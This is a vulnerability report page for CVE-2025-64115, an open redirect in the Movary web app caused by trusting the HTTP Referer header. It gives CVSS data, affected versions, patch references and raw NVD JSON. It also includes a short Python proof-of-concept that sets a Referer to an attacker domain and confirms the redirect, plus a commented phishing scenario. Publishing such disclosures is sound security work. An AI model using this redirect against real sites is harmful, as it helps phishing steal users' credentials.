Security Vulnerability Report
CVE-2025-64115 CVSS 6.1 MEDIUM

CVE-2025-64115

Published: 2025-10-30 18:15:33
Last Modified: 2025-12-08 15:34:33

Description

Movary is a web application to track, rate and explore your movie watch history. Versions up to and including 0.68.0 use the HTTP Referer header value directly for redirects in multiple settings endpoints, allowing a crafted link to cause an open redirect to an attacker-controlled site and facilitate phishing. This vulnerability is fixed in 0.69.0.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:leepeuker:movary:*:*:*:*:*:*:*:* - VULNERABLE
Movary <= 0.68.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# PoC for CVE-2025-64115 Open Redirect in Movary
# Target: Movary <= 0.68.0


def exploit_open_redirect(target_url, malicious_domain):
    """
    Exploit the open redirect vulnerability by manipulating the Referer header

    Args:
        target_url: Base URL of the vulnerable Movary instance
        malicious_domain: Attacker's controlled domain for redirect

    Returns:
        bool: True if the redirect is successful
    """
    # Craft the malicious URL pointing to settings endpoint
    settings_endpoint = f"{target_url}/settings"

    # Set the Referer header to point to attacker-controlled site
    headers = {
        'Referer': f"https://{malicious_domain}/malicious-page",
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    }

    try:
        # Send request to trigger redirect
        response = requests.get(settings_endpoint, headers=headers, allow_redirects=False)

        # Check if Location header contains the malicious domain
        if 'Location' in response.headers:
            location = response.headers['Location']
            print(f"[+] Redirect Location: {location}")
            if malicious_domain in location:
                print("[!] Open Redirect Vulnerability Confirmed!")
                return True
        return False
    except requests.RequestException as e:
        print(f"[-] Error: {e}")
        return False


# Example usage
if __name__ == "__main__":
    target = "http://vulnerable-movary.com"
    attacker_domain = "evil-phishing-site.com"
    result = exploit_open_redirect(target, attacker_domain)
    print(f"Exploit Result: {result}")

# Attack scenario:
# 1. Attacker creates a phishing page on evil-phishing-site.com
# 2. Attacker sends malicious link to victim
# 3. Victim clicks link and visits vulnerable Movary site
# 4. Application reads attacker's Referer header
# 5. Victim gets redirected to phishing site
# 6. Victim enters credentials on fake login page
```

References

https://github.com/leepeuker/movary/commit/716f703b4464ffdb0365c406f3660d275495769f (Patch)
https://github.com/leepeuker/movary/pull/713 (Issue Tracking)
https://github.com/leepeuker/movary/security/advisories/GHSA-pm58-79jw-q79f (Exploit, Third Party Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-64115",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-30T18:15:33.363",
    "lastModified": "2025-12-08T15:34:33.193",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Movary is a web application to track, rate and explore your movie watch history. Versions up to and including 0.68.0 use the HTTP Referer header value directly for redirects in multiple settings endpoints, allowing a crafted link to cause an open redirect to an attacker-controlled site and facilitate phishing. This vulnerability is fixed in 0.69.0."
      }
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 5.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "privilegesRequired": "NONE",
            "userInteraction": "ACTIVE",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "NONE",
            "vulnAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "LOW",
            "subIntegrityImpact": "LOW",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "NOT_DEFINED",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          { "lang": "en", "value": "CWE-601" }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:leepeuker:movary:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "0.69.0",
                "matchCriteriaId": "19118997-9D9D-427F-9958-F4471F9D0CFB"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/leepeuker/movary/commit/716f703b4464ffdb0365c406f3660d275495769f",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/leepeuker/movary/pull/713",
        "source": "[email protected]",
        "tags": ["Issue Tracking"]
      },
      {
        "url": "https://github.com/leepeuker/movary/security/advisories/GHSA-pm58-79jw-q79f",
        "source": "[email protected]",
        "tags": ["Exploit", "Third Party Advisory"]
      }
    ]
  }
}
```